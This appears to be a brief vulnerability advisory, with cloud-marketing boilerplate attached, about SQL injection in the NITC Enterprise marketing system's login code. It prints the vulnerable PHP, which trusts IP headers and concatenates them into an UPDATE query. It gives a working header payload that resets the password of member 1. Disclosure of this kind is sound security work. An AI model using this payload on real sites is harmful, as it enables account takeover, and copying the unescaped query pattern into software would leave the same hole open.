NITC Enterprise Edition SQL Injection allows you to reset any User Password
NITC Enterprise Intelligent Marketing System
function getip( ){ if ( isset( $_SERVER ) ) { if ( isset( $_SERVER[HTTP_X_FORWARDED_FOR] ) ) { $realip = $_SERVER[HTTP_X_FORWARDED_FOR]; return $realip; } if ( isset( $_SERVER[HTTP_CLIENT_IP] ) ) { $realip = $_SERVER[HTTP_CLIENT_IP]; return $realip; } $realip = $_SERVER[REMOTE_ADDR]; return $realip; } if ( getenv( "HTTP_X_FORWARDED_FOR" ) ) { $realip = getenv( "HTTP_X_FORWARDED_FOR" ); return $realip; } if ( getenv( "HTTP_CLIENT_IP" ) ) { $realip = getenv( "HTTP_CLIENT_IP" ); return $realip; } $realip = getenv( "REMOTE_ADDR" ); return $realip;}
Ip address retrieval is not filtered, resulting in multiple SQL injections on the website
if ( $action == "login" ){ .... $ip = getip( ); $_SESSION['member_email'] = $email; $_SESSION['member_id'] = $result['member_id']; $_SESSION['state'] = $result['state']; $_SESSION['member_name'] = $result['name']; $site->table( "member" )( "update ".$site->table( "member" ).( " set last_ip='".$ip."',last_time='" ).date( "Y-m-d H:i:s", time( ) )."' where member_id=".$result['member_id'] );}
When a user logs on, the user logs on to the IP address. Due to the update of user data, you can directly use SQL injection to update the password of any user.
POC: Add client-ip: ', password = ''where member_id = 1 # To head #
Solution:
Filter
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
